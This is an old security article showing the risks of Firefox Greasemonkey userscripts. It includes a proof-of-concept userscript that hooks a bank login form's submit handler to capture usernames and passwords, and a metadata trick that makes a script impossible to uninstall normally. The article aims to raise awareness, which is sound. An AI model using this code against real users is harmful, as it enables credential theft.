--------------------------------------------------- Vision of danger: The Firefox Greasemonkey --------------------------------------------------- written by Piotr Bania [___ http://pb.specialised.info ___] Original location: http://pb.specialised.info/all/articles/monkey.txt ----------------- 0. DISCLAIMER ----------------- Author takes no responsibility for any actions with provided information or codes. The copyright for any material created by the author is reserved. Any duplication of codes or texts provided here in electronic or printed publications (including compiled code) is not permitted without the author's agreement. ----------------- I. INTRODUCTION ----------------- Greasemonkey is a free and very popular nowadays extension for Firefox browser. This tool lets users to add DHTML scripts to any web site and change its original behaviour. Its a nice feature, nice for good and bad guys...This short paper was written to show what can happen if user will run a "bad" script, the idea is to show the danger itself. ----------------- II. BAD SCRIPTS ----------------- A) MAKING "UNABLE TO UNINSTALL" SCRIPT Usually standard script starts with special header (metadata tags) like here: --------// SNIP //-------- // ==UserScript== // @name Say Hello! // @namespace http://youngpup.net/userscripts // @description Greets the world // @include http://google.com/* // @include http://www.google.com/* // @exclude http://gmail.google.com/* // ==/UserScript== --------// SNIP //-------- Following information is used when installing/working/uninstalling Greasemonkey scripts. Script with specially generated @name metadata tag cannot be uninstalled automatically with Firefox (user must delete the file by hand). Here is a sample "bad" @name tag: --------// SNIP //-------- // ==UserScript== // @name Im a script <5000*SPACE_CHAR_:]) // ... --------// SNIP //-------- Within the script uninstallation the windows resizes and the only thing user can do is close it. If user wants to delete the script he must do it manually, and delete the file from: "{firefox profile dir}\extensions\{e4a8a97b-f2ed-450b-b12d-ee082ba24781}\ chrome\greasemonkey\content\scripts\" dir. B) SPYING THE CITYBANK LOGIN PAGE Potential attacker can also write a script which will steal some data, like demonstrated below. Anyway there are plenty of other ideas, here we assume a scenario in which the attacker wants to grab CITYBANK user LOGIN and PASSWORD. Original website: https://cib.ibanking-services.com/cib/login.jsp?FIORG=775&FIFID=125106986&id=1449852460 (SPYER.user.js) --------// SNIP //-------- // ==UserScript== // @name Super Spyer :) - (c) Piotr Bania // @namespace http://pb.specialised.info // @description Shows potencial risk of Firefox scripting. // @include * // ==/UserScript==s // we assume that form used by Citibank is named as "login", the login textbox is named // as "userid" and password box is named as "password" look at CITIBANK page source. // Citibank is using some "onsumbit" routine so we must execute it together with ours (function() { var old_ons = document.login.onsubmit.toString(); // grab old routine name var new_ons = "spy();" + "\r" + old_ons.substring(old_ons.indexOf("{") + 1,old_ons.lastIndexOf("}") - 1); document.login.onsubmit = new Function(new_ons); })(); function spy() { alert("I have spyed you!!!\n\r\n\r\n\r-------------\n\rLOGIN: "+document.login.userid.value+"\n PASSWORD: "+document.login.password.value+"\n\r-------------\n\r\n\r\n\rhttp://pb.specialised.info"); } --------// SNIP //-------- Such stolen information can be transferred to attackers servers/email accounts etc. etc. There are many types and variations of such scenario. ---------------------- III. FINAL THOUGHTS ---------------------- Using Greasemonkey can be fun and a dangerous also, everything depends on the level of user knowledge... I want to end this short article with words from Aaron Boodman (author of Greasemonkey): "All I can say is that just like any other software, you should think a tiny bit before installing a user script... Make sure the author is someone you trust, or at least in a social network you trust." Peace.